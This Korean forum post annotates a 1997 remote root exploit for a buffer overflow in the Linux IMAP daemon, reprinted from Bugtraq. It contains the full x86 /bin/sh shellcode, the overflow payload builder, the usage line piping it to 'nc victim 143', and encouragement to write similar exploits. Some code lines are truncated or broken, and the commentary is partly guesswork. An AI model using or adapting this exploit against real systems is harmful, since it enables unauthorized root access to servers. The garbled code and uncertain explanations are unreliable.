해커즈뉴스 제공 리눅스의 모든것

	No, 4 홈페이지: http://www.hackersnews.org 조회: 411 버퍼오버플로우 해킹 소스 코드 설명  EXPLOIT 을 보면서 설명하죠... 설명을 주석처리를 하겠습니다... 소스는 버그트랩에서 가지고 왔습니다. 사실 저도 자세한 구성원리나 그런것은 잘 알지 못합니다... imap 의 실제 소스코드를 본적이 없거든여..,, 저 버전의 imap 이여... 자세한 구성원리는 나중에 기회가 되면 해드리고여... 지금은 대략적인 내용 을 설명해드리고... 대략적 구성원리를 배우고...소스를 분석하는 기회로 갖죠. 먼저 이 imap 버그는 buffer overflow버그입니다. 그리고... remote(원격지)에서 그러니까 외부에서란 말이죠... 외부에서 한번에 root로 떨어지는 가장 무서운 버그죠.. 하지만 요즘버전의 Imap은 고쳐졌습니다. ________________________________________________________________________ /* * IMAPd Linux/intel remote xploit by  savage@apostols.org  1997-April-05 * * usage: *      $ (imap 0; cat) | nc victim 143 *   *              | *              +--> usually from -1000 to 1000 ( try in steps of 100 ) * *              [ I try 0, 100 and 200 - so1o ] */ /*  리눅스에서는 저런 명령 형식이 굉장히 중요하죠...     작은 파일 여러개가 모여 굉장히 강력한 힘을 발위하죠... */ #include char shell[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\xeb\x3b\x5e\x89\x76\x08\x31\xed\x31\xc9\x31\xc0\x88" "\x6e\x07\x89\x6e\x0c\xb0\x0b\x89\xf3\x8d\x6e\x08\x89\xe9\x8d\x6e" "\x0c\x89\xea\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\xe8\xc0\xff\xff\xff/bin/sh"; /* 버퍼 오버 플로우를 내는 해킹 코드입니다. */ char username[1024+255]; /* 변수로 유저네임을 지정해놨군요... 1024+255가 나왔군요... 왜 1279로 안하고 저 렇게 했을까여.. 아마도 IMAP 프로그램에서 login 입력부분을 CHAR 로 해논것 같군요. CHAR는 255 인것 아시죠? */ void main(int argc, char *argv[]) { /* 프로그램에서 변수를 받는 부분이죠... 컴파일을 IMAP-EX 라고 한다면...   $IMAP-EX 0 이렇게 사용하라고 위에 나왔죠... 그걸 지정하는 부분입니다. */              int i,a;        long val; /* 여러 변수를 지정해 줬죠... 사용을 뒤에 나오겠죠.. 그때 설명할까여^^ */        if(argc>1) /* 만약 IMAP-EX 뒤에 숫자가 1보다 크다면... */                a=atoi(argv[1]); /* 입력 받은 숫자를 A 에 대입해라 */        else                a=0; /* 그렇지 안다면 a에 0을 입력하라... 마이너스 값을 입력 않되도록 프로그래밍   한것 이군여 */        strcpy(username,shell); /* 이제 아까 지정했던 username 에 아까 제가 버퍼오버플로우를 내는 코드라고   말씀드린것 있죠? 그걸 대입시키는 것입니다...   아마도 imap 서비스에서 입력부분(id or pass)에 저 코드를 대입시킬것인가 보군여   슬슬 눈치 까시는 분도 계시겠군요.. 자세한 설명을 뒤에 합니다. */        for(i=strlen(username);i                username[i]=0x90; /* NOP */ /*   strlen 이라는 함수는 값의 메모리 크기를 구해주는 것입니다.   맞나^^? 그리고 sizeof 는 배열의 크기를 구해주죠...   배열이 꽉찰때까지 1씩을 계속 더해주며 0x90이라는 값을 대입해주고 있어여   그리고 밑의 소스를 보면 i=1024부터 코드를 대입하죠? 그래서 제가 생각하건데   sizeof(username) 는 1024가 아닐까여?? 그 전까지 다 대입을 하니까여...   그다음 1024부터 다른값을 대입하면 말이 되겠죠? */        val = 0xbffff501 + a; /* 그리고 아까 실행화일 뒤에 변수값을 더해주는군요... 그리고 val이라는 변수에   대입합니다 */        for(i=1024;i        {                username[i+0] = val & 0x000000ff;                username[i+1] = (val & 0x0000ff00) >> 8;                username[i+2] = (val & 0x00ff0000) >> 16;                username[i+3] = (val & 0xff000000) >> 24;        } /*   1024라는 값을 시작으로 유저네임의 메모리값-4 의 값까지 i에 4씩을 더해주며   for 문을 돌리고 있죠... 네? 그런건 다 안다구여?? 죄송...^^   그리고 username에 무엇인가 코드를 계속 대입해 주고 있죠?     그리고 마지막 4의 메모리를 남겨주었죠? 무슨 의미일까여?   바로 그 4의부분에 /bin/sh 가 들어있을껏 같은데... */        username[ sizeof(username)-1 ] = 0; /* 유저네임의 배열마지막에 0을 넣어주었습니다. */        printf("%d LOGIN \"%s\" pass\n", sizeof(shell), username); /* 이제 출력을 해주죠... 로긴을 하는 명령어 같은데... */ /* IMAP 프로그램에서는 [id] LOGIN [passwd] pass 이런식으로 로긴을 하나 봅니다.*/ /* 바로 위에 저렇게 복잡하게 대입시키던 코드를 이제야 사용하죠.. */   } 소스를 쫙 분석해 보았습니다... 이제 아시겟나여? 아마도 제가 생각하기에는 저 버전의 imap 프로그램이.. 패스워드 입력부분의 사이즈를 채크하지 않아서 생기는 buffer overflow(버퍼오버플로 우) 를 이용한 해킹코드인것 같습니다. imap 프로그램은 suid 프로그램이기 때문에 저 코드를 실행시키면 리모트에서 한번에 root가 되버릴것 같습니다. 전체적인 구성원리를 보면... 유저네임이라는 변수에... 계속적으로 변수를 넣어주고 있죠... 그것이 나중에 passwd 입력에 쓰이죠... 정말 프로그램 짤때 조심해야 겠어여.. 이런 사소한것도 파고들다니... passwd 입력에 엄청나게 큰 값이 입력되고... 그러므로서 imap 으로 overflow가 나고 셸로 떨어진다라는 원리 같네여. 더 자세히 해보라구여? 네.~ 저 코드를 자세히 들여다 보시면... username 의 변수까지 저 위에 있는 값을 계속 대입시켜주죠? 그러니까 passwd 입력부분을 꽉 채우는 겁니다... 아시겠나여? 음~ 그러니까 [     ] <-이만큼 passwd 의 입력을 받는 메모리가 있다면.. [#####] 저 코드들로 이렇게 꽉 채워주고 그 뒤에 /bin/sh 가 되죠... char shell[]  부분을 보시면 마지만에 /bin/sh가 있죠 그것입니다. 그래서 id 입력부분에 저렇게 해주고... 그럼 셸로 떨어지죠... 그것도 root 상태로 돌아가던 suid라 root로 떨어지죠... 엄청나죠? ____________________________________________________________________________ 자! 지금까지 과거에 아주 유명했던 imap프로그램의 버퍼오버플로우를 분석했는데 어떠셨나여? 질문은 여기 게시판에 해주세요... 여러 사람이 같이 봐야 하니까여... 초보분께는 좀 어려울껏 같네여... 그래서 제가 질문을 받으면 아주 자세히 해드리죠 그리고 저도 인간이기 때문에 [헷갈림] 이라는것이 존재합니다. 그러니 제가 틀린것이 있다!!! 하시면 가차없이 충고해 주세요... exploit 분석은 해킹공부에 엄청난 도움이 됩니다. 왜그런진 다 아시겠죠? 저처럼 imap소스를 안봐도 저 exploit 만으로 구성원리를 알아차렸습니다. 따라서 비슷한 경우 문제가 생기면... 여러분이 저걸 응용해 혼자 소스를 짤수도 있겠죠 .^^. 그러면... 진정한 해커의 계열에 올라서는 것입니다. ## 다음에는 좀더 잘 강의를 하겠습니다. ## bugtraq 에 가시면 지금까지 공개된 거의 모든 exploit 이 있습니다. 스스로 분석해 보시구여... 원래는 메일링 리스트인데 넘 유명하다 보니 그 메일들을 모아논 site가 생기는군여 yahoo 등에서 bugtraq이라고 치시면 나올껍니다. 그럼 이만~ 번호 제 목 작성일 조회 10   Pipes 명령 05-21  210 9   파일 자동 백업 하기 05-20  222 8   vi ^M 문자 없애는 또다른 방법 05-19  245 7   Telnet, Ssh 특정 계정 접속 방지 05-18  306 6   각 포트별 TCP/UDP 서비스 05-17  343 5   핑공격의 허와실 05-17  438 4   버퍼오버플로우 해킹 소스 코드 설명 05-17  410 3   shell 종류와,변경하기 05-16  253 2   man 과 info 사용법 05-16  270 1   스팸메일 추적하기 05-15  630